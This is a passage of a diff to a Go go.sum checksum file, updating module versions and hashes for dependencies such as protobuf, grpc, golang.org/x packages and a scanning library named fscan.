h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= github.com/google/cel-go v0.6.0/go.mod h1:rHS68o5G1QcUv/ubiCoZ5nT5LHxRWWfS0qMzTgv42WQ= +github.com/google/cel-go v0.7.3 h1:8v9BSN0avuGwrHFKNCjfiQ/CE6+D6sW+BDyOVoEeP6o= +github.com/google/cel-go v0.7.3/go.mod h1:4EtyFAHT5xNr0Msu0MJjyGxPUgdr9DlcaPyzLt/kkt8= github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ= +github.com/google/cel-spec v0.5.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= -github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/hirochachacha/go-smb2 v1.0.10 h1:fiSNyMOOlWzfdTVk6VtvxfDGqhjNDI2iYZjd/jdtmhk= -github.com/hirochachacha/go-smb2 v1.0.10/go.mod h1:8F1A4d5EZzrGu5R7PU163UcMRDJQl4FtcxjBfsY8TZE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5 
h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 h1:P2S26PMwXl8+ZGuOG3C69LG4be5vHafUayZm9VPw3tU= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU= -github.com/lib/pq v1.10.1 h1:6VXZrLU0jHBYyAqrSPa+MgPfnSvTPuMgK+k0o5kVFWo= github.com/lib/pq v1.10.1/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= +github.com/lib/pq v1.10.2 h1:AqzbZs4ZoCBp+GtejcpCpcxM3zlSMx29dXbUSeVtJb8= +github.com/lib/pq v1.10.2/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca h1:NugYot0LIVPxTvN8n+Kvkn6TrbMyxQiuvKdEwFdR9vI= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 h1:OWSmL0LYmfDX2oXDt3RErvCAQpyZNUm7AFgZJ5q43sA= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4/go.mod h1:dG+K6/t5Skg+75lDytmXIBzl7XU4rMvBaMYOeIifBTI= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww= +github.com/stoewer/go-strcase v1.2.0 
h1:Z2iHWqGXH00XYgqDmNgQbIBxf3wrNq0F3feEy0ainaU= +github.com/stoewer/go-strcase v1.2.0/go.mod h1:IBiWB2sKIp3wVVQ3Y035++gc+knqhUQag1KpM8ahLw8= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= -golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de h1:ikNHVSjEfnvz6sxdSPCaPt572qowuyMDMJLLm3Db3ig= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 h1:/UOmuWzQfxxo9UtlXMwuQU8CMgg1eZXqTRwkSQJWKOI= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint 
v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20200301022130-244492dfa37a h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210716203947-853a461950ff h1:j2EK/QoxYNBsXI4R7fQkkRUk8y6wnOBI+6hgPdP/6Ds= +golang.org/x/net v0.0.0-20210716203947-853a461950ff/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= 
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So= golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod 
h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 
google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= -google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 h1:N5O9PpTbQrkvH0IQ1q+mmGyg8Gt6iKcu6b6+gmz3jnA= google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200513103714-09dca8ec2884/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20201102152239-715cce707fb0/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f h1:YORWxaStkWBnWgELOHTmDrqNlFXuVGEbhwbB5iK94bQ= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= -google.golang.org/grpc v1.27.1 h1:zvIju4sqAGvwKspUQOhwnpcqSbzi7/H6QomNNjTL4sk= google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod 
h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1 h1:SnqbnDw1V7RiZcXPx5MEeqPv2s79L9i7BJUlG/+RurQ= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod 
h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=